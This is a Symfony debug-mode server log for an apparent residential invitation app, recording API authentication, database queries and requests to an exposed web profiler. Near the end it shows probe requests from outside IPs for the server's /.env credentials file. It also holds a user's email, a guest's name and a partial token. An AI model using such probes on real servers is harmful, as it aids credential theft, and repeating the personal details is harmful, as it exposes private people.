[2025-12-18 20:26:07] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:07] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
[2025-12-18 20:26:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:26:07] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:07] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:07] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:07] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 20:27:18] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-18 20:27:18] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:27:18] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-18 20:27:18] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-18 20:27:18] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 20:27:18] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:27:18] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["586cd940-fe5c-40f9-b203-99 [...]"] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [375,251,1] []
[2025-12-18 20:27:18] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 20:27:18] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"f5fb1cf7-ba48-477a-88d3-3a [...]","2":1,"3":"2025-12-18 20:27:18","4":"2025-12-18 20:27:18","5":"Eugenia","6":"Ruiz","7":"336801","8":"/invitation/22c9906b8d8c9a [...]","9":"2","10":"1","11":"2025-12-19 16:00:00","12":null,"13":null,"14":null,"15":251,"16":375} []
[2025-12-18 20:27:18] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [251] []
[2025-12-18 20:27:18] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 20:27:18] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a725d03d-0217-4179-9082-5a05b0a9293e/invitation/20/0?order=desc","method":"GET"} []
[2025-12-18 20:27:18] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:27:18] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-18 20:27:18] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-18 20:27:18] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 20:27:18] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:27:18] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [251,1] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [251,1] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:27:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [417] []
[2025-12-18 20:27:18] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 20:28:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=db","method":"GET"} []
[2025-12-18 20:28:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 20:29:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=time","method":"GET"} []
[2025-12-18 20:29:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 20:37:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=cache","method":"GET"} []
[2025-12-18 20:37:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 20:45:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 20:46:05] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 20:46:08] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"342871","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/342871","method":"GET"} []
[2025-12-18 20:46:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=security","method":"GET"} []
[2025-12-18 20:46:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 20:55:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20","method":"GET"} []
[2025-12-18 20:55:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 21:00:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"993d28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/993d28?panel=time","method":"GET"} []
[2025-12-18 21:00:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 21:04:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=request","method":"GET"} []
[2025-12-18 21:04:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 21:12:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=cache","method":"GET"} []
[2025-12-18 21:12:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 21:23:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=82.22.238.79&limit=10&url=https%3A%2F%2F35.175.10.94%2F.env","method":"GET"} []
[2025-12-18 21:23:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=82.22.238.79&limit=10&url=https%3A%2F%2F35.175.10.94%2F.env","method":"GET"} []
[2025-12-18 21:23:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=twig","method":"GET"} []
[2025-12-18 21:23:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 21:26:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a42ca9?panel=dump","method":"GET"} []
[2025-12-18 21:26:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-18 21:29:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"342871","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/342871/search/results?ip=2.54.30.13&limit=10","method":"GET"} []
[2025-12-18 21:29:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=2.54.30.13&limit=10","method":"GET"} []
[2025-12-18 21:33:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=time","method":"GET"} []
[2025-12-18 21:33:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 21:36:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-18 21:36:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 21:36:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 21:36:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 21:36:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 21:36:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 21:36:09] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 21:37:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-18 21:37:10] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 21:37:10] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 21:37:10] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 21:37:10] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 21:37:10] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 21:37:10] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 21:39:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 21:39:41] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-18 21:43:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=request","method":"GET"} []
[2025-12-18 21:43:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 21:44:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 21:50:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"423f35","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/423f35","method":"GET"} []
